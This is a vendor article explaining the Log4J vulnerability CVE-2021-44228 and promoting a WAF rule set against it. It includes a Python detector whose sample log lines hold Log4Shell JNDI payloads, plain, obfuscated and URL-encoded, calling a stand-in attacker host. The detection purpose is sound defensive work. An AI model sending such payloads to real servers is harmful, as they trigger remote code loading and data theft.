
BSI red alert: Security experts, developers, and admins around the globe are working hard to close the critical Log4J vulnerability in their systems. The flaw (CVE-2021-44228) allows cybercriminals to inject malicious code into web servers and connected systems without being detected. The potential consequences range from data loss and blackmail attempts to internet service outages and the compromise of entire corporate networks.
The affected companies and their customers are in a race against time. While massive efforts are being made everywhere to rectify the problem as quickly as possible, cybercriminals are stepping up their attacks on vulnerable systems by systematically scanning the internet for unprotected web servers.

How the Log4J exploit works

To exploit the vulnerability in the Java library, attackers send text snippets containing specially crafted strings, for example as usernames or messages, to a web application that uses Log4J for logging. The lookup injected in this way causes the application to load additional malicious code from servers controlled by the attackers. This can be any sort of malicious code, including viruses, Trojans, or even worms. Using the Log4J vulnerability, attackers can thus also take control of the entire system and operate it remotely.

There are already initial indications of successful compromises with cryptominers siphoning off computing power from infected systems for mining cryptocurrencies such as Bitcoin. The vulnerability is also reportedly already being actively exploited by botnets. For a successful attack, attackers don’t even need to load malicious code. The German Federal Office for Information Security (BSI) warns that individual requests are sufficient for disclosing sensitive data such as API keys.

Highest threat level

The BSI has issued the highest warning level (4/Red) for the Log4J vulnerability. Since the Java logging library is widely used, a vast number of solutions and systems from all sectors and company sizes are at risk from the flaw. A list of security warnings for products from over 450 manufacturers (as of December 15) is being maintained on the GitHub code platform, and this figure is rising. According to the BSI, the extent of the threat situation cannot yet be conclusively determined. It is, however, apt to compare this with the Heartbleed Bug, a critical error in OpenSSL, which endangered the encrypted communication of hundreds of thousands of web servers and services in 2014.

Log4J mitigation with the Myra Hyperscale WAF

To mitigate Log4J-based attacks, Myra Security offers a specially developed rule set for its Hyperscale WAF. Deploying the new rules helps companies transparently detect Log4J exploits on their systems and block access to vulnerable servers. As a result, affected companies gain valuable time to patch affected systems and scrub compromised web servers.
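The following added example (not Myra's rule set and not code from the original article) shows what a WAF-style check for the request strings described above can look like: it decodes and de-obfuscates a request field and classifies it as a JNDI lookup, some other Log4J lookup, or clean. The `${jndi:` marker, the `lower`/`upper` and `:-` default-value lookup forms, and the sample access-log lines are assumptions taken from public detection guidance and constructed for illustration.

```python
import re
import urllib.parse

_LOOKUP = re.compile(r"\$\{([^${}]*)\}")          # innermost ${...} lookup
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

def normalize(value: str) -> str:
    """Undo URL encoding and collapse nested lookups, e.g. ${${lower:j}ndi:..} -> ${jndi:..}."""
    for _ in range(3):                      # stacked encodings: decode until stable
        decoded = urllib.parse.unquote(value)
        if decoded == value:
            break
        value = decoded

    def collapse(m: "re.Match") -> str:
        body = m.group(1)
        prefix, sep, rest = body.partition(":")
        prefix = prefix.strip().lower()
        if sep and prefix in ("lower", "upper"):
            return rest                     # ${lower:J} -> J (case is irrelevant here)
        if ":-" in body and prefix != "jndi":
            return body.split(":-", 1)[1]   # ${undefined:-x} evaluates to its default x
        return m.group(0)                   # keep real lookups such as ${jndi:...} intact

    previous = None
    while previous != value:                # each pass strictly shortens, so this terminates
        previous = value
        value = _LOOKUP.sub(collapse, value)
    return value

def classify(value: str) -> str:
    """'jndi' for a JNDI lookup, 'lookup' for any other ${...} lookup, else 'clean'."""
    norm = normalize(value)
    if _JNDI.search(norm):
        return "jndi"
    if _LOOKUP.search(norm):
        return "lookup"
    return "clean"

# Constructed sample access-log lines (not real traffic); the quoted User-Agent
# is the attacker-controlled field that a Java backend would hand to Log4j.
SAMPLE_LOG = [
    '198.51.100.7 "GET / HTTP/1.1" 200 "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.8 "GET /login HTTP/1.1" 200 "${jndi:ldap://evil.example/a}"',
    '198.51.100.9 "GET /api HTTP/1.1" 200 "${${lower:j}ndi:${::-l}dap://evil.example/a}"',
    '198.51.100.10 "POST /form HTTP/1.1" 200 "%24%7Bjndi%3Armi%3A%2F%2Fevil.example%2Fb%7D"',
]

def scan_log(lines):
    """Verdict per log line, keyed by line position."""
    return {i: classify(line) for i, line in enumerate(lines)}
```

In a real deployment the same check would run on every attacker-controllable field (headers, query and form parameters, JSON bodies), not just the User-Agent, and a `jndi` verdict would block the request while `lookup` is worth alerting on as well.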

Myra thus offers fast and efficient assistance in the current exceptional situation. You are welcome to contact us with any questions you may have concerning Log4J mitigation.
